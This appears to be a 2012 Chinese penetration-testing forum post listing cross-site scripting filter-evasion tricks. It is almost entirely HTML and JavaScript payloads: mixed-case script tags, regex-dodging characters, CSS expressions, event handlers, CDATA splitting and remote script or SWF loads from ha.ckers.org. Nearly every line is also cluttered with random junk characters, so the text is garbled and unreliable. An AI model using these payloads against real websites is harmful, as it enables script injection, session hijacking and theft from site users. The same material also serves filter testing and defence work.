中国网络渗透测试联盟

标题: Cross Site Scripting(XSS)攻击手法介绍 [打印本页]

作者: admin    时间: 2012-12-31 09:59
标题: Cross Site Scripting(XSS)攻击手法介绍
1. 改变字符大小写
0 B! w1 O" v& X& I: s; S! g4 m, w" D# ]: h! [  K0 g( Z

& I% D# f9 r4 d. t) v  G: q
+ P; A6 C5 \) n2 T/ a0 S, G    <sCript>alert(‘d’)</scRipT>
; D. ]' g: z: ~
. C( Q( r: S+ {3 [2. 利用多加一些其它字符来规避Regular Expression的检查' A! t! s5 s/ l+ B$ L) H+ c
; `# ^! |+ m9 p' r: I/ z1 Z
    <<script>alert(‘c’)//<</script>1 R) k$ h- r' J% H9 Y$ ]7 i6 l

: r1 ^, x/ Y# |& w7 u    <SCRIPT a=">" SRC="t.js"></SCRIPT>
- j2 w1 A7 O9 k2 K
3 K! B0 {/ U: W, B    <SCRIPT =">" SRC="t.js"></SCRIPT>+ @7 M- [9 F7 R; ^& u* E4 |2 G' H

0 p4 k6 N2 E: x5 g" ~4 Q    <SCRIPT a=">" ” SRC="t.js"></SCRIPT>' B" W6 A" T6 ~

" I' d4 r' k' J/ E9 m; X) U. n, V    <SCRIPT "a=’>’" SRC="t.js"></SCRIPT>8 R/ X+ ^/ S( G# M! [* i

( G# A2 Z' V1 E# |' s$ `    <SCRIPT a=`>` SRC="t.js"></SCRIPT>- V7 k$ ]; D' _  H7 B- `# ~

. _( C" a0 T! l* Q; Y+ ]/ K' ~* d    <SCRIPT a=">’>" SRC="t.js"></SCRIPT>( T# r6 |1 I- F1 K/ D; o0 n

2 k1 a- v! }* m3. 以其它扩展名取代.js
3 w! u6 x9 |5 l* ?7 D  l$ s( b8 x8 n7 M3 r2 J. J* Y% S8 r! ~
    <script src="bad.jpg"></script>
  J3 [* A( O5 c! s. a
  J* r! d$ b9 `; z4. 将Javascript写在CSS档里
( j5 l0 T3 H% x! b' @, B5 ~/ \. x3 f$ j& ~) h8 V. C5 i
    <LINK REL="stylesheet" HREF="http://ha.ckers.org/xss.css">
0 L* S) j: Q9 W' ]3 P# ^1 x, Z; X0 m. ]) i. |4 x; P9 u$ l2 i2 |7 l
       example:/ D% H/ X' f# Q

8 M1 X! o# V! {! V4 _0 T          body {- l0 G/ q% C0 i% p( a* H/ Z
$ d( b+ {. \7 o1 F7 k) T* P& Z
               background-image: url(‘javascript:alert("XSS");’)  B- {! T/ W* l+ S7 K+ j8 x

6 a+ A' ?5 P+ M7 L          }
: a8 I. G, i- I3 q9 O! n5 G& D) ~' H# s2 `% L0 i. Z
5. 在script的tag里加入一些其它字符& S) K  v. J4 w0 ?' _. E" G
3 d, ^3 h: k7 @
    <SCRIPT/SRC="t.js"></SCRIPT>
6 R+ z. Z8 `: y
& `6 x, P" p" t5 j. O  X" k: z    <SCRIPT/anyword SRC="t.js"></SCRIPT>
/ \3 H; f! a  G8 E- ~( b0 C2 Q
( n9 U8 Y! t1 Y2 }7 e8 @, K6. 使用tab或是new line来规避
5 F% ^1 y3 u; \) s) w$ `9 T/ D# S! O# I3 H2 |( K
    <img src="jav ascr ipt:alert(‘XSS3′)">
3 Y  p% r  l+ X0 r; N1 o2 L* _
0 ?7 t- ?; h; p4 ^) s7 S    <img src="jav ascr ipt:alert(‘XSS3′)">
& J0 y. i* w7 i
6 Y4 C$ y- F$ j' W    <IMG SRC="jav ascript:alert(‘XSS’);">
6 O( f( j" I2 G+ v/ f: ^1 t6 q# u
* O. B  i1 c. y  |0 k         -> tag
0 h9 Z/ d6 n" o7 H3 E5 N3 i+ z; Z9 M/ b# S7 z8 o, K! ^
         -> new line6 Q. @3 r+ H; j5 z" [

8 d+ y/ G8 M! R1 [. f1 W7. 使用"\"来规避1 Z3 |0 M. n% R) `; \
8 U! f3 j+ p& h) ]
    <STYLE>@im\port’\ja\vasc\ript:alert("XSS32")’;</STYLE>
- E/ i2 K5 ^5 m: ?& @; x& d
8 Z! N- Y6 s$ `" `    <IMG STYLE=’xss:expre\ssion(alert("XSS33"))’>
+ J! g/ ?, L& Q2 E5 F
$ ?+ l6 O" t( L2 J& [$ ]; ]6 N    <IMG STYLE="xss:expr/*anyword*/ession(alert(‘sss’))">
: M) u7 N0 {! b8 i" ^* d( E" V. i. l0 h" x4 l
    <DIV STYLE="width: expre\ssi\on(alert(‘XSS31′));">
. h+ {/ p4 y. |" a3 a
+ E/ e" d# k' I  F- ^3 A0 x! T    <A STYLE=’no\xss:noxss("*//*"); xss:ex/*XSS*//*/*/pression(alert("XSS"))’>2 m" ]* c0 g9 K* H6 X

2 r+ C/ W. y$ Q7 f% Q2 v0 E$ |* K1 I8. 使用Hex encode来规避(也可能会把";"拿掉)
7 t- [: n' f1 a" n* G0 y/ g- Z- C6 O! {
    <DIV STYLE="width: expre\ssi\on(alert(‘XSS31′));">
. y% ?* s; }" e5 o+ X; E, ]/ u% m+ X& N& F$ i$ y) V
        原始码:<DIV STYLE="width: expre\ssi\on(alert(‘XSS31′));">
% A" D* W0 F; s% K+ ]- N' T, h: U: t7 h; P- L7 d( D. U
    <META HTTP-EQUIV="refresh" CONTENT="0;url=javascript:alert(‘abc’);">
0 O4 R6 {: v) Q6 v/ L# q  C4 }9 S# c, K$ }
        原始码:<META HTTP-EQUIV="refresh" CONTENT="0;url=javascript:alert(‘abc’);">9 N0 f& V$ r* q
3 h) B+ C6 O, H1 ^# h
9. script in HTML tag
! K# v! y1 d! p( b8 D
5 `3 l( Y) r6 \) F+ C    <body onload=」alert(‘onload’)」># Y& z/ v+ k! |# j* P
! m+ F7 n  U6 T* W; D( g% R/ O! w
        onabort, onactivate, onafterprint, onafterupdate, onbeforeactivate, onbeforecopy, onbeforecut, onbeforedeactivate, onbeforeeditfocus, onbeforepaste, onbeforeprint, onbeforeunload, onbeforeupdate, onblur, onbounce, oncellchange, onchange, onclick, oncontextmenu, oncontrolselect, oncopy, oncut, ondataavailable, ondatasetchanged, ondatasetcomplete, ondblclick, ondeactivate, ondrag, ondragend, ondragenter, ondragleave, ondragover, ondragstart, ondrop, onerror, onerrorupdate, onfilterchange, onfinish, onfocus, onfocusin, onfocusout, onhelp, onkeydown, onkeypress, onkeyup, onlayoutcomplete, onload, onlosecapture, onmousedown, onmouseenter, onmouseleave, onmousemove, onmouseout, onmouseover, onmouseup, onmousewheel, onmove, onmoveend, onmovestart, onpaste, onpropertychange, onreadystatechange, onreset, onresize, onresizeend, onresizestart, onrowenter, onrowexit, onrowsdelete, onrowsinserted, onscroll, onselect, onselectionchange, onselectstart, onstart, onstop, onsubmit, onunload' @) u. d) P3 t* C( O' o

( X, ]0 S: G' J! H10. 在swf里含有xss的code
" m. o' G6 X" }! Z# l" N. p
* p, ?2 z9 C7 i' r/ j    <EMBED SRC="http://ha.ckers.org/xss.swf" AllowScriptAccess="always"></EMBED>
( G1 z" W. D! g0 F; B4 {' Y5 A. z( e
# d8 w; |. q- |1 S6 A% u11. 利用CDATA将xss的code拆开,再组合起来。
  b& o1 T' g, e- g: G4 S7 b: _
$ J  j+ _& \+ S$ u. q1 B8 k    <XML ID=I><X><C>
# L; P$ f  T. s! A* w$ F6 P! |2 K7 i5 i
    <![CDATA[<IMG SRC="javas]]><![CDATA[cript:alert('XSS');">]]>9 V3 `; [) m2 |1 M9 {2 z+ h; N

! l$ s7 x0 b6 _4 \9 u) o    </C></X>
- `, P, b  R; [  r4 W1 O
  f/ h* s! Q: x. F2 W5 q- L    </xml>
4 j4 W& x$ y: u1 {2 R( Q* ^0 I# k) ?5 q
    <SPAN DATASRC=#I DATAFLD=C DATAFORMATAS=HTML></SPAN>) z4 r) A+ t8 w% z1 c7 H$ c1 Z

6 t; [- }' _2 X# X0 k    <XML ID="xss"><I><B><IMG SRC="javas<!– –>cript:alert(‘XSS’)"></B></I></XML>
# x- m+ K6 E( \4 d* b' C6 N
& ^2 i. F6 K- `; [" |    <SPAN DATASRC="#xss" DATAFLD="B" DATAFORMATAS="HTML"></SPAN>7 [# l# P) H; c  E- N9 x
0 c9 y6 a, U0 W0 n
12. 利用HTML+TIME。
$ s2 c* T0 N" A  d+ z( ~
3 f. O$ A' J/ S3 z" }9 N* C    <HTML><BODY>1 s  V! u6 _7 v

$ X/ b. r7 `6 @    <?xml:namespace prefix="t" ns="urn:schemas-microsoft-com:time">. q8 c  r' c7 v) G2 K
3 R" Z9 \' @. X% H! b8 J) e
    <?import namespace="t" implementation="#default#time2">" D3 M* \0 G" Z% O- ~

7 Z* a; y2 b4 ?3 H1 `    <t:set attributeName="innerHTML" to="anyword<SCRIPTDEFER>alert("XSS")</SCRIPT>"># t$ ?( B- K) L9 i

4 u9 n. `. I3 W2 n* s) H+ C    </BODY></HTML>
  g/ a+ x5 g3 D; V1 G9 H  b# [8 @. s- Y5 p3 |( W6 J/ j
13. 透过META写入Cookie。
$ X" H6 Z- Q0 ~6 ~. ]% u
) t! l& v% Y8 a1 N: s    <META HTTP-EQUIV="Set-Cookie" Content="USERID=<SCRIPT>alert(‘XSS’)</SCRIPT>">
! J+ h7 z' ]" W- b% X$ f1 b; Z6 c% v: {! m4 h4 ]
14. javascript in src , href , url! j- P" y* `" y, F5 N
/ z$ R: \' a8 ^9 M: Q8 k6 B5 \! {  Y
    <IFRAME SRC=javascript:alert(’13′)></IFRAME>3 K" G; U- w8 F( R7 Q5 o# p

% S1 y1 C; S; M    <img src="javascript:alert(‘XSS3′)">  k' h5 K$ w: ]! {4 e( w9 O
2 g, w% t; z$ L3 u  @1 F
<IMG DYNSRC="javascript:alert(‘XSS20′)">/ P* Y2 G% e/ Z9 U0 t1 @2 C

7 o$ N2 n. R6 Y( c# W% x: V7 c8 D    <IMG LOWSRC="javascript:alert(‘XSS21′)">2 N3 d6 \0 [0 {# _9 @
1 i; \3 O1 j" L1 z  y* ~$ m
    <LINK REL="stylesheet" HREF="javascript:alert(‘XSS24′);">' n5 f8 N0 d) f+ j# @
5 R/ A: g# @( d( c6 r
    <IFRAME SRC=javascript:alert(‘XSS27′)></IFRAME>) r9 ]8 I9 t7 c  R7 @. u; c
* \2 b% V6 l! {( H
    <TABLE BACKGROUND="javascript:alert(‘XSS29′)">
2 ^& m$ f2 E; O% \0 C1 x
: U7 ?2 _; d" q# |9 Y& ]) N! o5 G3 K    <DIV STYLE="background-image: url(javascript:alert(‘XSS30′))">+ W3 p% N+ G" w7 x

+ P' V, z1 }$ a& n3 |' @& ]7 _    <STYLE TYPE="text/css">.XSS{background image:url("javascript:alert(‘XSS35′)");}
- A, \4 B! @/ _
/ X5 ^' `6 }: x' ^- g    </STYLE><A CLASS=XSS></A>
$ G7 k' m, j' m& N. t: Z6 k5 O* X! K
    <FRAMESET><FRAME SRC="javascript:alert(‘XSS’);"></FRAMESET>/ L, Y3 Q3 o+ [1 h3 Y- e+ E: R: ]

& E0 ^/ F; F5 v




欢迎光临 中国网络渗透测试联盟 (https://www.cobjon.com/) Powered by Discuz! X3.2